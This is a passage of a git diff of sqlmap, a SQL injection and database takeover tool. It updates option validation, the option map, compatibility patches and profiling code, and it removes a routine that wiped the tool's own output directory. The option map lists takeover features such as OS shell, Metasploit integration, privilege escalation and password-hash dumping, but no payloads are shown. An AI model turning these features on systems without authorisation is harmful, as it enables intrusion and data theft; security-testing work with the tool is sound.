SqlmapSyntaxException(errMsg) + + if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)): + errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'" + raise SqlmapSyntaxException(errMsg) + + if conf.safeReqFile and any((conf.safeUrl, conf.safePost)): + errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfUrl and not conf.csrfToken: + errMsg = "option '--csrf-url' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfMethod and not conf.csrfToken: + errMsg = "option '--csrf-method' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfData and not conf.csrfToken: + errMsg = "option '--csrf-data' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfToken and conf.threads > 1: + errMsg = "option '--csrf-url' is incompatible with option '--threads'" + raise SqlmapSyntaxException(errMsg) + + if conf.requestFile and conf.url and conf.url != DUMMY_URL: + errMsg = "option '-r' is incompatible with option '-u' ('--url')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.proxy: + errMsg = "option '-d' is incompatible with option '--proxy'" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.tor: + errMsg = "option '-d' is incompatible with switch '--tor'" raise SqlmapSyntaxException(errMsg) - if conf.requestFile and conf.url: - errMsg = "option '-r' is incompatible with option '-u' (--url)" + if not conf.technique: + errMsg = "option '--technique' can't be empty" raise SqlmapSyntaxException(errMsg) if conf.tor and conf.ignoreProxy: @@ -1986,12 +2837,20 @@ def _basicOptionValidation(): errMsg = "switch '--tor' is incompatible with option '--proxy'" raise SqlmapSyntaxException(errMsg) + if conf.proxy and conf.proxyFile: + errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + + if conf.proxyFreq and not conf.proxyFile: + errMsg = "option '--proxy-freq' requires usage of option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + if conf.checkTor and not any((conf.tor, conf.proxy)): - errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" + errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)" raise SqlmapSyntaxException(errMsg) - if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0): - errMsg = "value for option '--tor-port' must be a positive integer" + if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535): + errMsg = "value for option '--tor-port' must be in range [0, 65535]" raise SqlmapSyntaxException(errMsg) if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): @@ -2002,10 +2861,21 @@ def _basicOptionValidation(): errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) raise SqlmapSyntaxException(errMsg) - if conf.skip and conf.testParameter: - errMsg = "option '--skip' is incompatible with option '-p'" + if conf.uValues and (not re.search(r"\A['\w\s.,()%s-]+\Z" % CUSTOM_INJECTION_MARK_CHAR, conf.uValues) or conf.uValues.count(CUSTOM_INJECTION_MARK_CHAR) != 1): + errMsg = "option '--union-values' must contain valid UNION column values, along with the injection position " + errMsg += "(e.g. 'NULL,1,%s,NULL')" % CUSTOM_INJECTION_MARK_CHAR raise SqlmapSyntaxException(errMsg) + if conf.skip and conf.testParameter: + if intersect(conf.skip, conf.testParameter): + errMsg = "option '--skip' is incompatible with option '-p'" + raise SqlmapSyntaxException(errMsg) + + if conf.rParam and conf.testParameter: + if intersect(conf.rParam, conf.testParameter): + errMsg = "option '--randomize' is incompatible with option '-p'" + raise SqlmapSyntaxException(errMsg) + if conf.mobile and conf.agent: errMsg = "switch '--mobile' is incompatible with option '--user-agent'" raise SqlmapSyntaxException(errMsg) @@ -2014,90 +2884,100 @@ def _basicOptionValidation(): errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'" raise SqlmapSyntaxException(errMsg) - if conf.forms and any([conf.logFile, conf.direct, conf.requestFile, conf.googleDork]): - errMsg = "switch '--forms' is compatible only with options '-u' (--url) and '-m'" + if conf.alert and conf.alert.startswith('-'): + errMsg = "value for option '--alert' must be valid operating system command(s)" raise SqlmapSyntaxException(errMsg) if conf.timeSec < 1: errMsg = "value for option '--time-sec' must be a positive integer" raise SqlmapSyntaxException(errMsg) - if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar): - errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" + if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)): + errMsg = "option '--crack' should be used as a standalone" raise SqlmapSyntaxException(errMsg) - if isinstance(conf.uCols, basestring): + if isinstance(conf.uCols, six.string_types): if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): errMsg = "value for option '--union-cols' must be a range with hyphon " errMsg += "(e.g. 1-10) or integer value (e.g. 5)" raise SqlmapSyntaxException(errMsg) - if conf.charset: - _ = checkCharEncoding(conf.charset, False) + if conf.dbmsCred and ':' not in conf.dbmsCred: + errMsg = "value for option '--dbms-cred' must be in " + errMsg += "format : (e.g. \"root:pass\")" + raise SqlmapSyntaxException(errMsg) + + if conf.encoding: + _ = checkCharEncoding(conf.encoding, False) if _ is None: - errMsg = "unknown charset '%s'. Please visit " % conf.charset + errMsg = "unknown encoding '%s'. Please visit " % conf.encoding errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE - errMsg += "supported charsets" + errMsg += "supported encodings" raise SqlmapSyntaxException(errMsg) else: - conf.charset = _ + conf.encoding = _ - if conf.loadCookies: - if not os.path.exists(conf.loadCookies): - errMsg = "cookies file '%s' does not exist" % conf.loadCookies - raise SqlmapFilePathException(errMsg) + if conf.fileWrite and not os.path.isfile(conf.fileWrite): + errMsg = "file '%s' does not exist" % os.path.abspath(conf.fileWrite) + raise SqlmapFilePathException(errMsg) + + if conf.loadCookies and not os.path.exists(conf.loadCookies): + errMsg = "cookies file '%s' does not exist" % os.path.abspath(conf.loadCookies) + raise SqlmapFilePathException(errMsg) -def _resolveCrossReferences(): - lib.core.threads.readInput = readInput - lib.core.common.getPageTemplate = getPageTemplate - lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage +def initOptions(inputOptions=AttribDict(), overrideOptions=False): + _setConfAttributes() + _setKnowledgeBaseAttributes() + _mergeOptions(inputOptions, overrideOptions) -def init(inputOptions=AttribDict(), overrideOptions=False): +def init(): """ Set attributes into both configuration and knowledge base singletons based upon command line and configuration file options. """ - if not inputOptions.disableColoring: - coloramainit() - - _setConfAttributes() - _setKnowledgeBaseAttributes() - _mergeOptions(inputOptions, overrideOptions) _useWizardInterface() setVerbosity() - setRestAPILog() - _saveCmdline() + _saveConfig() _setRequestFromFile() _cleanupOptions() - _purgeOutput() + _cleanupEnvironment() + _purge() _checkDependencies() + _createHomeDirectories() + _createTemporaryDirectory() _basicOptionValidation() + _setProxyList() _setTorProxySettings() _setDNSServer() _adjustLoggingFormatter() _setMultipleTargets() + _listTamperingFunctions() _setTamperingFunctions() + _setPreprocessFunctions() + _setPostprocessFunctions() _setTrafficOutputFP() - _resolveCrossReferences() + _setupHTTPCollector() + _setHttpOptions() - parseTargetUrl() parseTargetDirect() - if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.liveTest)): + if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.stdinPipe)): + _setHostname() _setHTTPTimeout() _setHTTPExtraHeaders() _setHTTPCookies() _setHTTPReferer() + _setHTTPHost() _setHTTPUserAgent() - _setHTTPMethod() _setHTTPAuthentication() - _setHTTPProxy() + _setHTTPHandlers() _setDNSCache() - _setSafeUrl() - _setGoogleDorking() + _setSocketPreConnect() + _setSafeVisit() + _doSearch() + _setStdinPipeTargets() _setBulkMultipleTargets() - _urllib2Opener() _checkTor() _setCrawler() _findPageForms() @@ -2109,6 +2989,7 @@ def init(inputOptions=AttribDict(), overrideOptions=False): _setWriteFile() _setMetasploit() _setDBMSAuthentication() + loadBoundaries() loadPayloads() _setPrefixSuffix() update() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index d2029176982..c38e61eefde 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,222 +1,281 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ optDict = { - # Format: - # Family: { "parameter name": "parameter datatype" }, - # Or: - # Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") }, - "Target": { - "direct": "string", - "url": "string", - "logFile": "string", - "bulkFile": "string", - "requestFile": "string", - "sessionFile": "string", - "googleDork": "string", - "configFile": "string", - }, - - "Request": { - "data": "string", - "pDel": "string", - "cookie": "string", - "loadCookies": "string", - "dropSetCookie": "boolean", - "agent": "string", - "randomAgent": "boolean", - "rParam": "string", - "forceSSL": "boolean", - "host": "string", - "referer": "string", - "headers": "string", - "aType": "string", - "aCred": "string", - "aCert": "string", - "proxy": "string", - "pCred": "string", - "ignoreProxy": "boolean", - "delay": "float", - "timeout": "float", - "retries": "integer", - "scope": "string", - "safUrl": "string", - "saFreq": "integer", - "skipUrlEncode": "boolean", - "evalCode": "string", - }, - - "Optimization": { - "optimize": "boolean", - "predictOutput": "boolean", - "keepAlive": "boolean", - "nullConnection": "boolean", - "threads": "integer", - }, - - "Injection": { - "testParameter": "string", - "dbms": "string", - "os": "string", - "invalidBignum": "boolean", - "invalidLogical": "boolean", - "noCast": "boolean", - "noEscape": "boolean", - "prefix": "string", - "suffix": "string", - "skip": "string", - "tamper": "string", - }, - - "Detection": { - "level": "integer", - "risk": "integer", - "string": "string", - "notString": "string", - "regexp": "string", - "code": "integer", - "textOnly": "boolean", - "titles": "boolean", - }, - - "Techniques": { - "tech": "string", - "timeSec": "integer", - "uCols": "string", - "uChar": "string", - "dnsName": "string", - "secondOrder": "string", - }, - - "Fingerprint": { - "extensiveFp": "boolean", - }, - - "Enumeration": { - "getAll": "boolean", - "getBanner": ("boolean", "Banners"), - "getCurrentUser": ("boolean", "Users"), - "getCurrentDb": ("boolean", "Databases"), - "getHostname": "boolean", - "isDba": "boolean", - "getUsers": ("boolean", "Users"), - "getPasswordHashes": ("boolean", "Passwords"), - "getPrivileges": ("boolean", "Privileges"), - "getRoles": ("boolean", "Roles"), - "getDbs": ("boolean", "Databases"), - "getTables": ("boolean", "Tables"), - "getColumns": ("boolean", "Columns"), - "getSchema": "boolean", - "getCount": "boolean", - "dumpTable": "boolean", - "dumpAll": "boolean", - "search": "boolean", - "db": "string", - "tbl": "string", - "col": "string", - "user": "string", - "excludeSysDbs": "boolean", - "limitStart": "integer", - "limitStop": "integer", - "firstChar": "integer", - "lastChar": "integer", - "query": "string", - "sqlShell": "boolean", - "sqlFile": "string", - }, - - "Brute": { - "commonTables": "boolean", - "commonColumns": "boolean", - }, - - "User-defined function": { - "udfInject": "boolean", - "shLib": "string", - }, - - "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", - }, - - "Takeover": { - "osCmd": "string", - "osShell": "boolean", - "osPwn": "boolean", - "osSmb": "boolean", - "osBof": "boolean", - "privEsc": "boolean", - "msfPath": "string", - "tmpPath": "string", - }, - - "Windows": { - "regRead": "boolean", - "regAdd": "boolean", - "regDel": "boolean", - "regKey": "string", - "regVal": "string", - "regData": "string", - "regType": "string", - }, - - "General": { - #"xmlFile": "string", - "trafficFile": "string", - "batch": "boolean", - "charset": "string", - "checkTor": "boolean", - "crawlDepth": "integer", - "csvDel": "string", - "dbmsCred": "string", - "dumpFormat": "string", - "eta": "boolean", - "flushSession": "boolean", - "forms": "boolean", - "freshQueries": "boolean", - "hexConvert": "boolean", - "oDir": "string", - "parseErrors": "boolean", - "saveCmdline": "boolean", - "updateAll": "boolean", - "tor": "boolean", - "torPort": "integer", - "torType": "string", - }, - - "Miscellaneous": { - "mnemonics": "string", - "alert": "string", - "answers": "string", - "beep": "boolean", - "checkPayload": "boolean", - "checkWaf": "boolean", - "cleanup": "boolean", - "dependencies": "boolean", - "disableColoring": "boolean", - "googlePage": "integer", - "hpp": "boolean", - "mobile": "boolean", - "pageRank": "boolean", - "purgeOutput": "boolean", - "smart": "boolean", - "testFilter": "string", - "wizard": "boolean", - "verbose": "integer", - }, - "Hidden": { - "profile": "boolean", - "cpuThrottle": "integer", - "forceDns": "boolean", - "smokeTest": "boolean", - "liveTest": "boolean", - "stopFail": "boolean", - "runCase": "string", - } - } + # Family: {"parameter name": "parameter datatype"}, + # --OR-- + # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")}, + + "Target": { + "direct": "string", + "url": "string", + "logFile": "string", + "bulkFile": "string", + "requestFile": "string", + "sessionFile": "string", + "googleDork": "string", + "configFile": "string", + }, + + "Request": { + "method": "string", + "data": "string", + "paramDel": "string", + "cookie": "string", + "cookieDel": "string", + "liveCookies": "string", + "loadCookies": "string", + "dropSetCookie": "boolean", + "http2": "boolean", + "agent": "string", + "mobile": "boolean", + "randomAgent": "boolean", + "host": "string", + "referer": "string", + "headers": "string", + "authType": "string", + "authCred": "string", + "authFile": "string", + "abortCode": "string", + "ignoreCode": "string", + "ignoreProxy": "boolean", + "ignoreRedirects": "boolean", + "ignoreTimeouts": "boolean", + "proxy": "string", + "proxyCred": "string", + "proxyFile": "string", + "proxyFreq": "integer", + "tor": "boolean", + "torPort": "integer", + "torType": "string", + "checkTor": "boolean", + "delay": "float", + "timeout": "float", + "retries": "integer", + "retryOn": "string", + "rParam": "string", + "safeUrl": "string", + "safePost": "string", + "safeReqFile": "string", + "safeFreq": "integer", + "skipUrlEncode": "boolean", + "csrfToken": "string", + "csrfUrl": "string", + "csrfMethod": "string", + "csrfData": "string", + "csrfRetries": "integer", + "forceSSL": "boolean", + "chunked": "boolean", + "hpp": "boolean", + "evalCode": "string", + }, + + "Optimization": { + "optimize": "boolean", + "predictOutput": "boolean", + "keepAlive": "boolean", + "nullConnection": "boolean", + "threads": "integer", + }, + + "Injection": { + "testParameter": "string", + "skip": "string", + "skipStatic": "boolean", + "paramExclude": "string", + "paramFilter": "string", + "dbms": "string", + "dbmsCred": "string", + "os": "string", + "invalidBignum": "boolean", + "invalidLogical": "boolean", + "invalidString": "boolean", + "noCast": "boolean", + "noEscape": "boolean", + "prefix": "string", + "suffix": "string", + "tamper": "string", + }, + + "Detection": { + "level": "integer", + "risk": "integer", + "string": "string", + "notString": "string", + "regexp": "string", + "code": "integer", + "smart": "boolean", + "textOnly": "boolean", + "titles": "boolean", + }, + + "Techniques": { + "technique": "string", + "timeSec": "integer", + "uCols": "string", + "uChar": "string", + "uFrom": "string", + "uValues": "string", + "dnsDomain": "string", + "secondUrl": "string", + "secondReq": "string", + }, + + "Fingerprint": { + "extensiveFp": "boolean", + }, + + "Enumeration": { + "getAll": "boolean", + "getBanner": ("boolean", "Banners"), + "getCurrentUser": ("boolean", "Users"), + "getCurrentDb": ("boolean", "Databases"), + "getHostname": "boolean", + "isDba": "boolean", + "getUsers": ("boolean", "Users"), + "getPasswordHashes": ("boolean", "Passwords"), + "getPrivileges": ("boolean", "Privileges"), + "getRoles": ("boolean", "Roles"), + "getDbs": ("boolean", "Databases"), + "getTables": ("boolean", "Tables"), + "getColumns": ("boolean", "Columns"), + "getSchema": "boolean", + "getCount": "boolean", + "dumpTable": "boolean", + "dumpAll": "boolean", + "search": "boolean", + "getComments": "boolean", + "getStatements": "boolean", + "db": "string", + "tbl": "string", + "col": "string", + "exclude": "string", + "pivotColumn": "string", + "dumpWhere": "string", + "user": "string", + "excludeSysDbs": "boolean", + "limitStart": "integer", + "limitStop": "integer", + "firstChar": "integer", + "lastChar": "integer", + "sqlQuery": "string", + "sqlShell": "boolean", + "sqlFile": "string", + }, + + "Brute": { + "commonTables": "boolean", + "commonColumns": "boolean", + "commonFiles": "boolean", + }, + + "User-defined function": { + "udfInject": "boolean", + "shLib": "string", + }, + + "File system": { + "fileRead": "string", + "fileWrite": "string", + "fileDest": "string", + }, + + "Takeover": { + "osCmd": "string", + "osShell": "boolean", + "osPwn": "boolean", + "osSmb": "boolean", + "osBof": "boolean", + "privEsc": "boolean", + "msfPath": "string", + "tmpPath": "string", + }, + + "Windows": { + "regRead": "boolean", + "regAdd": "boolean", + "regDel": "boolean", + "regKey": "string", + "regVal": "string", + "regData": "string", + "regType": "string", + }, + + "General": { + "trafficFile": "string", + "abortOnEmpty": "boolean", + "answers": "string", + "batch": "boolean", + "base64Parameter": "string", + "base64Safe": "boolean", + "binaryFields": "string", + "charset": "string", + "checkInternet": "boolean", + "cleanup": "boolean", + "crawlDepth": "integer", + "crawlExclude": "string", + "csvDel": "string", + "dumpFile": "string", + "dumpFormat": "string", + "encoding": "string", + "eta": "boolean", + "flushSession": "boolean", + "forms": "boolean", + "freshQueries": "boolean", + "googlePage": "integer", + "harFile": "string", + "hexConvert": "boolean", + "outputDir": "string", + "parseErrors": "boolean", + "postprocess": "string", + "preprocess": "string", + "repair": "boolean", + "saveConfig": "string", + "scope": "string", + "skipHeuristics": "boolean", + "skipWaf": "boolean", + "testFilter": "string", + "testSkip": "string", + "timeLimit": "float", + "unsafeNaming": "boolean", + "webRoot": "string", + }, + + "Miscellaneous": { + "alert": "string", + "beep": "boolean", + "dependencies": "boolean", + "disableColoring": "boolean", + "disableHashing": "boolean", + "listTampers": "boolean", + "noLogging": "boolean", + "noTruncate": "boolean", + "offline": "boolean", + "purge": "boolean", + "resultsFile": "string", + "tmpDir": "string", + "unstable": "boolean", + "updateAll": "boolean", + "wizard": "boolean", + "verbose": "integer", + }, + + "Hidden": { + "dummy": "boolean", + "disablePrecon": "boolean", + "profile": "boolean", + "forceDns": "boolean", + "murphyRate": "integer", + "smokeTest": "boolean", + }, + + "API": { + "api": "boolean", + "taskid": "string", + "database": "string", + } +} diff --git a/lib/core/patch.py b/lib/core/patch.py new file mode 100644 index 00000000000..bcd79982ec9 --- /dev/null +++ b/lib/core/patch.py @@ -0,0 +1,223 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import codecs +import collections +import inspect +import logging +import os +import random +import re +import sys + +import lib.controller.checks +import lib.core.common +import lib.core.convert +import lib.core.option +import lib.core.threads +import lib.request.connect +import lib.utils.search +import lib.utils.sqlalchemy +import thirdparty.ansistrm.ansistrm +import thirdparty.chardet.universaldetector + +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.common import isDigit +from lib.core.common import isListLike +from lib.core.common import readInput +from lib.core.common import shellExec +from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange +from lib.core.convert import stdoutEncode +from lib.core.data import conf +from lib.core.enums import PLACE +from lib.core.option import _setHTTPHandlers +from lib.core.option import setVerbosity +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT +from lib.core.settings import IS_WIN +from lib.request.templates import getPageTemplate +from thirdparty import six +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client + +_rand = 0 + +def dirtyPatches(): + """ + Place for "dirty" Python related patches + """ + + # accept overly long result lines (e.g. SQLi results in HTTP header responses) + _http_client._MAXLINE = 1 * 1024 * 1024 + + # prevent double chunked encoding in case of sqlmap chunking (Note: Python3 does it automatically if 'Content-length' is missing) + if six.PY3: + if not hasattr(_http_client.HTTPConnection, "__send_output"): + _http_client.HTTPConnection.__send_output = _http_client.HTTPConnection._send_output + + def _send_output(self, *args, **kwargs): + if conf.get("chunked") and "encode_chunked" in kwargs: + kwargs["encode_chunked"] = False + self.__send_output(*args, **kwargs) + + _http_client.HTTPConnection._send_output = _send_output + + # add support for inet_pton() on Windows OS + if IS_WIN: + from thirdparty.wininetpton import win_inet_pton + + # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440 + codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None) + + # Reference: http://bugs.python.org/issue17849 + if hasattr(_http_client, "LineAndFileWrapper"): + def _(self, *args): + return self._readline() + + _http_client.LineAndFileWrapper._readline = _http_client.LineAndFileWrapper.readline + _http_client.LineAndFileWrapper.readline = _ + + # to prevent too much "guessing" in case of binary data retrieval + thirdparty.chardet.universaldetector.MINIMUM_THRESHOLD = 0.90 + + match = re.search(r" --method[= ](\w+)", " ".join(sys.argv)) + if match and match.group(1).upper() != PLACE.POST: + PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1)) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/4314 + try: + os.urandom(1) + except NotImplementedError: + if six.PY3: + os.urandom = lambda size: bytes(random.randint(0, 255) for _ in range(size)) + else: + os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size)) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5929 + try: + import collections + if not hasattr(collections, "MutableSet"): + import collections.abc + collections.MutableSet = collections.abc.MutableSet + except ImportError: + pass + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5727 + # Reference: https://stackoverflow.com/a/14076841 + try: + import pymysql + pymysql.install_as_MySQLdb() + except (ImportError, AttributeError): + pass + + # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py + # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec + if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"): + ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults")) + + def makelist(data): + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] + + def getargspec(func): + spec = inspect.getfullargspec(func) + kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs) + return ArgSpec(kwargs, spec[1], spec[2], spec[3]) + + inspect.getargspec = getargspec + + # Installing "reversible" unicode (decoding) error handler + def _reversible(ex): + if INVALID_UNICODE_PRIVATE_AREA: + return (u"".join(_unichr(int('000f00%02x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end) + else: + return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end) + + codecs.register_error("reversible", _reversible) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5731 + if not hasattr(logging, "_acquireLock"): + def _acquireLock(): + if logging._lock: + logging._lock.acquire() + + logging._acquireLock = _acquireLock + + if not hasattr(logging, "_releaseLock"): + def _releaseLock(): + if logging._lock: + logging._lock.release() + + logging._releaseLock = _releaseLock + +def resolveCrossReferences(): + """ + Place for cross-reference resolution + """ + + lib.core.threads.isDigit = isDigit + lib.core.threads.readInput = readInput + lib.core.common.getPageTemplate = getPageTemplate + lib.core.convert.filterNone = filterNone + lib.core.convert.isListLike = isListLike + lib.core.convert.shellExec = shellExec + lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage + lib.core.option._pympTempLeakPatch = pympTempLeakPatch + lib.request.connect.setHTTPHandlers = _setHTTPHandlers + lib.utils.search.setHTTPHandlers = _setHTTPHandlers + lib.controller.checks.setVerbosity = setVerbosity + lib.utils.sqlalchemy.getSafeExString = getSafeExString + thirdparty.ansistrm.ansistrm.stdoutEncode = stdoutEncode + +def pympTempLeakPatch(tempDir): + """ + Patch for "pymp" leaking directories inside Python3 + """ + + try: + import multiprocessing.util + multiprocessing.util.get_temp_dir = lambda: tempDir + except: + pass + +def unisonRandom(): + """ + Unifying random generated data across different Python versions + """ + + def _lcg(): + global _rand + a = 1140671485 + c = 128201163 + m = 2 ** 24 + _rand = (a * _rand + c) % m + return _rand + + def _randint(a, b): + _ = a + (_lcg() % (b - a + 1)) + return _ + + def _choice(seq): + return seq[_randint(0, len(seq) - 1)] + + def _sample(population, k): + return [_choice(population) for _ in xrange(k)] + + def _seed(seed): + global _rand + _rand = seed + + random.choice = _choice + random.randint = _randint + random.sample = _sample + random.seed = _seed diff --git a/lib/core/profiling.py b/lib/core/profiling.py index be1da3511a1..a5936beadfe 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,91 +1,29 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs -import os import cProfile +import os -from lib.core.common import getUnicode from lib.core.data import logger from lib.core.data import paths -from lib.core.settings import UNICODE_ENCODING -def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): +def profile(profileOutputFile=None): """ This will run the program and present profiling data in a nice looking graph """ - try: - from thirdparty.gprof2dot import gprof2dot - from thirdparty.xdot import xdot - import gobject - import gtk - import pydot - except ImportError, e: - errMsg = "profiling requires third-party libraries (%s). " % getUnicode(e, UNICODE_ENCODING) - errMsg += "Quick steps:%s" % os.linesep - errMsg += "1) sudo apt-get install python-pydot python-pyparsing python-profiler graphviz" - logger.error(errMsg) - - return - if profileOutputFile is None: profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw") - if dotOutputFile is None: - dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.dot") - - if imageOutputFile is None: - imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.png") - if os.path.exists(profileOutputFile): os.remove(profileOutputFile) - if os.path.exists(dotOutputFile): - os.remove(dotOutputFile) - - if os.path.exists(imageOutputFile): - os.remove(imageOutputFile) - - infoMsg = "profiling the execution into file %s" % profileOutputFile - logger.info(infoMsg) - # Start sqlmap main function and generate a raw profile file cProfile.run("start()", profileOutputFile) - infoMsg = "converting profile data into a dot file '%s'" % dotOutputFile - logger.info(infoMsg) - - # Create dot file by using extra/gprof2dot/gprof2dot.py - # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING) - parser = gprof2dot.PstatsParser(profileOutputFile) - profile = parser.parse() - profile.prune(0.5 / 100.0, 0.1 / 100.0) - dot = gprof2dot.DotWriter(dotFilePointer) - dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP) - dotFilePointer.close() - - infoMsg = "converting dot file into a graph image '%s'" % imageOutputFile + infoMsg = "execution profiled and stored into file '%s' (e.g. 'gprof2dot -f pstats %s | dot -Tpng -o /tmp/sqlmap_profile.png')" % (profileOutputFile, profileOutputFile) logger.info(infoMsg) - - # Create graph image (png) by using pydot (python-pydot) - # http://code.google.com/p/pydot/ - pydotGraph = pydot.graph_from_dot_file(dotOutputFile) - pydotGraph.write_png(imageOutputFile) - - infoMsg = "displaying interactive graph with xdot library" - logger.info(infoMsg) - - # Display interactive Graphviz dot file by using extra/xdot/xdot.py - # http://code.google.com/p/jrfonseca/wiki/XDot - win = xdot.DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter("dot") - win.open_file(dotOutputFile) - gobject.timeout_add(1000, win.update, dotOutputFile) - gtk.main() diff --git a/lib/core/purge.py b/lib/core/purge.py deleted file mode 100644 index beae7113306..00000000000 --- a/lib/core/purge.py +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random -import shutil -import stat -import string - -from lib.core.data import logger - -def purge(directory): - """ - Safely removes content from a given directory - """ - - if not os.path.isdir(directory): - warnMsg = "skipping purging of directory '%s' as it does not exist" % directory - logger.warn(warnMsg) - return - - infoMsg = "purging content of directory ('%s'). Please wait as this could take a while" % directory - logger.info(infoMsg) - - filepaths = [] - dirpaths = [] - - for rootpath, directories, filenames in os.walk(directory): - dirpaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in directories]) - filepaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in filenames]) - - logger.debug("changing file attributes...") - for filepath in filepaths: - try: - os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) - except: - pass - - logger.debug("writing random data to files...") - for filepath in filepaths: - try: - filesize = os.path.getsize(filepath) - with open(filepath, 'w+b') as f: - f.write("".join(chr(random.randint(0, 255)) for _ in xrange(filesize))) - except: - pass - - logger.debug("truncating files...") - for filepath in filepaths: - try: - with open(filepath, 'w') as f: - pass - except: - pass - - logger.debug("renaming filenames to random values...") - for filepath in filepaths: - try: - os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.letters, random.randint(4, 8))))) - except: - pass - - dirpaths.sort(cmp=lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)) - - logger.debug("renaming directory names to random values...") - for dirpath in dirpaths: - try: - os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.letters, random.randint(4, 8))))) - except: - pass - - logger.debug("deleting the whole directory tree...") - os.chdir(os.path.join(directory, "..")) - shutil.rmtree(directory) diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 8500c9825a6..31349171be7 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,26 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap 